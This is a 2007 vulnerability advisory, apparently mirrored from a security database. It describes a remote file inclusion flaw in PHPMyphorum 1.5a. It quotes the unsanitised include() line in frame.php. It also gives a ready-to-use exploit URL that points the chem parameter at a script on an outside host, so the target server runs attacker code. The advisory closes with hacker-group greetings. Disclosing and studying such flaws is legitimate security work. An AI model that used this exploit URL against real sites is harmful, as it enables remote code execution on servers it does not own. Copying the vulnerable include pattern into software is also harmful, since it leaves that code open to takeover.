Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15754
HistoryJan 18, 2007 - 12:00 a.m.

PHPMyphorum 1.5a File Include Vulnerability

2007-01-1800:00:00
vulners.com
39

#########################################################################

[ PHPMyphorum 1.5a ]

Class: File Include Vulnerability

Published 2007/1/17

Remote: Yes

Critical Level : Dangerous

Site: http://www.comscripts.com/scripts/php.phpmyphorum.1104.html#

Author: TheViper-hacker

Contact: [email protected]

#########################################################################
file ;
frame.php

Vuln Code
include("$chem/session/cookie_sys_verif.php");

Exploit :

Http:// www.Victem.0 / [Comment IT_path] /mep/frame.php?chem=http://turnkringonzehoop.be/viper.txt?

---- Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA] ]organza[
---- GreeTz: All www.4azhar.Com Members Cont : [email protected]
--------------------------------------|| Viva ISLAM ||-----------------------------------------